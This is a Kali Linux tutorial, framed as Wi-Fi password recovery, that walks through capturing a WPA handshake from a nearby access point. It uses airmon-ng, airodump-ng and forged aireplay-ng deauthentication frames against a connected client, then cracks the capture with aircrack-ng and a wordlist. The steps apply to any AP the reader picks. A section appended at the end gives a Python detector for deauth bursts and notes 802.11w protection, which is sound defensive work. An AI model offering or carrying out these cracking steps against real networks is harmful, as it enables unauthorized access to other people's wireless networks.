How Do I Recover My Wifi Password

This article is for educational purposes only, and sorry for my horrible English, I hope you don't mind.

0x1 set up environment

Before we get started, make sure you have enough free disk space.

Check with:

df -h

If you are running Kali on VMware or another virtual environment, you will need a USB wireless card; this tutorial uses an adapter with the rtl8821cu chipset.

Check whether your driver is loaded:

airmon-ng

Install the kernel header files and the build tools the driver needs:

sudo apt-get update -y && sudo apt-get dist-upgrade
sudo apt install linux-headers-`uname -r`
sudo apt install bc module-assistant build-essential dkms -y

Then find the driver for your chipset on GitHub, install it, and reboot:

sudo reboot

Once that is done, switch to the root account:

sudo -i

0x2 get into honeypot

Type the following command and press Tab twice for completions:

iwconfig mode 

If the card supports it, the “Monitor” keyword should be among the completions:

Completing operating mode
Ad-Hoc     Auto       Managed    Master     Monitor    Repeater   Secondary

Before scanning, kill the processes that conflict with airmon-ng:

airmon-ng check kill

Next, enable monitor mode; your Wi-Fi connection will drop temporarily while the interface is in this mode.

Check the interface name:

iwconfig

└─# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     unassociated  Nickname:"<WIFI@REALTEK>"

Then start monitor mode on that interface:

airmon-ng start <InterfaceName>
airmon-ng start wlan0

After this command the interface name may have changed (mine did not). Run iwconfig again to confirm; airmon-ng itself reports:

PHY     Interface       Driver          Chipset

phy0    wlan0           rtl8821cu       Realtek Semiconductor Corp. 802.11ac NIC
                (monitor mode enabled)

Now scan for nearby networks:

airodump-ng <interface>

A lot of detail will scroll across the terminal, but you only need to note a few things.

The output has two tables, each keyed by BSSID:

 CH  1 ][ Elapsed: 2 mins ][ 2024-03-02 00:54

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID


 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

The first table lists the access points; the second lists which client device (STATION) is connected to which AP.

Pick the AP you want to “connect” to.

Note its BSSID and channel (CH), and note the MAC address of a client device connected to it.

If no client is connected to the AP you are interested in, this method cannot capture a handshake, so there is nothing to crack.

Open another terminal as root.

With the client's MAC address and the AP's BSSID, start the attack.

Once the following commands have run, the capture will produce some .cap files in the directory you are in.

Re-run:

airmon-ng stop <interface>
airmon-ng start <interface> -c [channel]

aireplay-ng -0 2 -a <AP MAC> -c <client MAC> <interface>

Then wait for <WPA handshake> to appear in the top-right corner of the first terminal.

Once you have the .cap file, have fun:

aircrack-ng -w <wordlist> <capfile>
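The `aireplay-ng -0` step works by sending the client a burst of forged deauthentication frames so that it reconnects and the handshake can be observed; that burst is also what a wireless IDS looks for. As an added example, not from the original post, the following sliding-window detector flags a BSSID that emits more than a handful of deauth/disassoc management frames within a short window. The frame tuples are constructed for the example and the field layout is an assumption, not any tool's output format.

```python
"""Flag deauthentication bursts per BSSID (added example, constructed input)."""
from collections import defaultdict, deque

MGMT = 0                    # 802.11 frame type: management
DEAUTH, DISASSOC = 12, 10   # management subtypes a deauth attack uses
DATA = 2


def find_deauth_bursts(frames, window_s=2.0, threshold=8):
    """Return {bssid: peak count} for every BSSID that sent at least `threshold`
    deauth/disassoc frames inside any `window_s`-second sliding window.

    `frames`: iterable of (timestamp_s, frame_type, subtype, bssid, dst).
    """
    recent = defaultdict(deque)   # per-BSSID timestamps still inside the window
    peak = defaultdict(int)
    for ts, ftype, subtype, bssid, _dst in sorted(frames, key=lambda f: f[0]):
        if ftype != MGMT or subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window_s:   # drop timestamps that fell out of the window
            q.popleft()
        peak[bssid] = max(peak[bssid], len(q))
    return {b: n for b, n in peak.items() if n >= threshold}


# Constructed sample: locally administered MACs, not real devices.
AP_A, AP_B = "02:00:00:00:00:aa", "02:00:00:00:00:bb"
CLIENT_1, CLIENT_2 = "02:00:00:00:00:c1", "02:00:00:00:00:c2"
SAMPLE_FRAMES = (
    [(t * 0.1, DATA, 0, AP_A, CLIENT_1) for t in range(30)]               # ordinary traffic
    + [(1.5, MGMT, DEAUTH, AP_A, CLIENT_1)]                               # one normal disconnect
    + [(2.0 + i * 0.02, MGMT, DEAUTH, AP_B, CLIENT_2) for i in range(20)]  # forged burst
)


if __name__ == "__main__":
    for bssid, count in find_deauth_bursts(SAMPLE_FRAMES).items():
        print(f"deauth burst from {bssid}: {count} frames in a 2 s window")
```

The single deauth from AP_A stays below the threshold, the 20-frame burst from AP_B is reported. On the mitigation side, 802.11w Protected Management Frames (required by WPA3) authenticates deauthentication and disassociation frames, so a client with PMF enabled discards the forged ones and this step of the walkthrough fails.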
Licensed under CC BY-NC-SA 4.0